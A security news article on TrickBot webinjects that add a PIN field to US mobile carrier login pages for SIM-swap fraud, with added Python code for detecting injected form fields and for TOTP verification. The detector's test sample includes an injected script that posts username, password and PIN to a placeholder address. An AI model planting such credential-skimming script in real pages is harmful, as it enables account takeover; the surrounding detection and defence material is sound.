TrickBot Tricks U.S. Users into Sharing their PIN Codes

The threat actor behind the infamous TrickBot botnet has added new functionality to their malware to request PIN codes from mobile users, Secureworks reports.

Operated by the hacking group previously associated with the Dyre Trojan, TrickBot has been around since October 2016, targeting hundreds of organizations around the world, mostly financial institutions. 

Starting in August 2019, the malware operators modified the webinjects used by TrickBot to target three of the largest mobile carriers in the United States, namely Verizon Wireless (August 5), T-Mobile (August 12), and Sprint (August 19). 

Following the update, when a victim navigates to the website of one of these organizations, TrickBot intercepts the legitimate server response and proxies it through a command and control (C&C) server that injects additional HTML and JavaScript into the page, Secureworks explains.

As a result, the page that renders in the victim’s browser carries an additional form field requesting the user’s mobile account PIN, alongside the legitimate username and password fields.

Code injected into the page also activates TrickBot’s record (rcrd) functionality to create an additional HTTP request containing the victim’s username, password, and PIN, data that is sent to the C&C server. 
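The injection described above leaves two fingerprints in the rendered page: a form field the real carrier page does not have, and script that sends the credentials somewhere other than the carrier. The following Python script is an added example, not code from the article or from Secureworks: it diffs the page as observed in a browser against a golden copy fetched through a trusted path, and reports added inputs, added script sources and any host referenced by newly appeared inline script. Both HTML samples are constructed for the example (the 203.0.113.7 address is a documentation range, not a real C&C), and the function names are this example’s own.

```python
import re
from collections import Counter
from html.parser import HTMLParser

# Constructed sample: the carrier's login page as fetched through an
# uncompromised path (the golden copy). Not a real carrier page.
BASELINE_HTML = """
<form action="/login" method="post">
  <input name="username" type="text">
  <input name="password" type="password">
  <input type="submit" value="Sign in">
</form>
<script src="/static/app.js"></script>
"""

# Constructed sample: the same page as rendered in an infected browser, with an
# extra PIN field and an inline script that posts the credentials elsewhere.
# 203.0.113.7 is a TEST-NET-3 documentation address, not a real C&C host.
INJECTED_HTML = """
<form action="/login" method="post">
  <input name="username" type="text">
  <input name="password" type="password">
  <input name="pin" type="password" maxlength="4">
  <input type="submit" value="Sign in">
</form>
<script src="/static/app.js"></script>
<script>
document.forms[0].addEventListener("submit", function () {
  var f = document.forms[0];
  fetch("https://203.0.113.7/rcrd", {method: "POST",
    body: JSON.stringify({u: f.username.value, p: f.password.value, pin: f.pin.value})});
});
</script>
"""

# Host part of any absolute http(s) URL appearing in script text.
URL_HOST = re.compile(r"""https?://([^/"'\s]+)""")


class FormInventory(HTMLParser):
    """Collect form inputs, external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.inputs = []          # (name, type) for each <input>
        self.script_srcs = []     # src attribute of each external <script>
        self.inline_scripts = []  # text of each inline <script>
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input":
            self.inputs.append((a.get("name", ""), a.get("type", "text")))
        elif tag == "script":
            if a.get("src"):
                self.script_srcs.append(a["src"])
            else:
                self._in_inline = True
                self._buf = []

    def handle_data(self, data):
        # html.parser delivers <script> bodies as CDATA through handle_data.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline_scripts.append("".join(self._buf).strip())
            self._in_inline = False


def inventory(html):
    p = FormInventory()
    p.feed(html)
    p.close()
    return p


def audit_login_page(baseline_html, observed_html):
    """Diff an observed page against the golden copy and report what was injected."""
    base, obs = inventory(baseline_html), inventory(observed_html)
    # Multiset difference, so a duplicated legitimate field is also reported.
    added_inputs = sorted((Counter(obs.inputs) - Counter(base.inputs)).elements())
    added_scripts = sorted(set(obs.script_srcs) - set(base.script_srcs))
    new_inline = [s for s in obs.inline_scripts if s not in base.inline_scripts]
    # Any absolute URL inside newly appeared inline script is a candidate exfil endpoint.
    hosts = sorted({h for s in new_inline for h in URL_HOST.findall(s)})
    return {
        "added_inputs": added_inputs,
        "added_scripts": added_scripts,
        "new_inline_scripts": len(new_inline),
        "exfil_hosts": hosts,
        "suspicious": bool(added_inputs or added_scripts or hosts),
    }


if __name__ == "__main__":
    for key, value in audit_login_page(BASELINE_HTML, INJECTED_HTML).items():
        print(f"{key}: {value}")
```

Because the injection happens in the victim’s browser after the server response has left the carrier, nothing on the carrier’s side sees it; a check like this has to run against the DOM (or a proxy capture) on the suspect endpoint, and any in-page integrity beacon can itself be edited by the same webinject, so the comparison belongs outside the page being inspected.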

The targeting of mobile carrier account PINs by this threat actor, or by other groups that rent access to TrickBot infections, suggests that the cybercriminals may be preparing for port-out or SIM swap fraud, Secureworks says. 

“This fraud allows an attacker to assume control of a victim’s telephone number, including all inbound and outbound text and voice communications. The interception of short message service (SMS)-based authentication tokens or password resets is frequently used during account takeover (ATO) fraud,” the security firm points out. 

To reduce exposure, organizations should use time-based one-time password (TOTP) multi-factor authentication (MFA) rather than SMS-based MFA, since a TOTP code is derived from a secret held on the user’s device and never passes through the carrier. They should also stop offering phone numbers as a password reset option, because a successful SIM swap hands the attacker every reset code sent that way. 
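The recommended replacement for SMS codes, as an added example that is not part of the article: RFC 6238 TOTP generation and verification in Python’s standard library, with a small clock-drift window and a replay check so a code harvested by an injected form cannot be reused after its first acceptance. The 20-byte secret and time values are the RFC 6238 Appendix B reference vectors; the `last_counter` bookkeeping and the function names are this example’s own assumptions, not part of the RFC.

```python
import base64
import hashlib
import hmac
import struct
import time

# RFC 6238 Appendix B reference secret (ASCII "12345678901234567890").
RFC6238_SECRET = b"12345678901234567890"
# The same secret as an authenticator app would receive it (base32, unpadded).
RFC6238_SECRET_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"


def decode_base32_secret(b32):
    """Decode the base32 secret shared at enrolment; padding and spaces are optional."""
    s = b32.strip().replace(" ", "").upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


def hotp(secret, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, at_time, step=30, digits=6):
    """RFC 6238 TOTP: HOTP over the number of `step`-second intervals since the epoch."""
    return hotp(secret, int(at_time) // step, digits)


def verify_totp(secret, code, at_time=None, last_counter=-1, step=30, digits=6, window=1):
    """Return the time-step counter the code matched, or None.

    Accepts codes from `window` steps either side of now to tolerate clock drift,
    compares in constant time, and refuses any counter at or below `last_counter`
    (the counter of the last accepted code, which the caller must persist per user),
    so an intercepted code is good for exactly one login.
    """
    if at_time is None:
        at_time = time.time()
    now = int(at_time) // step
    for counter in range(now - window, now + window + 1):
        if counter <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, counter, digits), str(code)):
            return counter
    return None


if __name__ == "__main__":
    secret = decode_base32_secret(RFC6238_SECRET_B32)
    code = totp(secret, time.time())
    print("current code:", code)
    accepted = verify_totp(secret, code)
    print("accepted at counter:", accepted)
    # Presenting the same code again with the stored counter is refused.
    print("replay accepted:", verify_totp(secret, code, last_counter=accepted))
```

Store `last_counter` with the user record and update it on every successful verification; without it, the drift window turns every captured code into a 90-second reusable credential. Keep the window at one step: widening it to absorb badly drifted phones also widens the replay exposure.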

Related: TrickBot Gets Computer Locking Capabilities

Related: Fully Operational TrickBot Banking Trojan Targets UK, Australia

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
